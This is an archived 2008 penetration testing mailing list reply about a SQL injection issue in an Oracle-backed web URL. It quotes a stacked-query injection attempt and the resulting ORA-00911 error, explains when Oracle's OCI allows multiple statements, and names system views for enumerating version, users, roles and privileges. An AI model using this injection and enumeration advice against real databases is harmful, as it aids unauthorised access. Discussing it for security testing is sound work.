Penetration Testing mailing list archives
Re: Oracle URL SQL Injection issue
From: Joxean Koret <joxeankoret () yahoo es>
Date: Tue, 22 Jan 2008 22:22:35 +0100
Hi, On lun, 2008-01-21 at 20:31 +0000, Clone wrote:
Well I already tried Id=90; select * from usr I got following OCIStmtExecute: ORA-00911: invalid character in dbs.inc on line 44
OCIStmtExecute refuses to execute more than one command except when the programmer uses a construction like: begin proc('user_controlled_data'); end;
BTW how serious is the issue? Can an attacker delete or modify database using the current issue?
It depends in the privileges the user have and in which applications are installed. First of all, you need to know the database version (banner -varchar2- from v$version), what other users are (all_users) and, of course, your roles (user_role_privs views) and granted system privileges (user_privs). Regards, Joxean Koret
Attachment:
signature.asc
Description: This is a digitally signed message part
Current thread:
- Re: Oracle URL SQL Injection issue, (continued)
- Re: Oracle URL SQL Injection issue jeffrey rivero (Jan 22)
- Re: Oracle URL SQL Injection issue Clone (Jan 22)
- Re: Oracle URL SQL Injection issue Cesar (Jan 23)
- Re: Oracle URL SQL Injection issue Clone (Jan 22)
- Re: Oracle URL SQL Injection issue Jason Thompson (Jan 22)
- Re: Oracle URL SQL Injection issue Francois Larouche (Jan 22)
- Re: Oracle URL SQL Injection issue Danux (Jan 22)
- RE: Oracle URL SQL Injection issue Thakrar, Saurabh (Jan 22)
- Re: Oracle URL SQL Injection issue David Howe (Jan 23)
- Re: Oracle URL SQL Injection issue Joe Yong (Jan 22)
- Re: Oracle URL SQL Injection issue Clone (Jan 22)
- Re: Oracle URL SQL Injection issue Joxean Koret (Jan 23)
- Re: Oracle URL SQL Injection issue Clone (Jan 22)
- Re: Oracle URL SQL Injection issue Todd Manning (Jan 22)
- Re: Oracle URL SQL Injection issue Clone (Jan 23)
- Re: Oracle URL SQL Injection issue jeffrey rivero (Jan 22)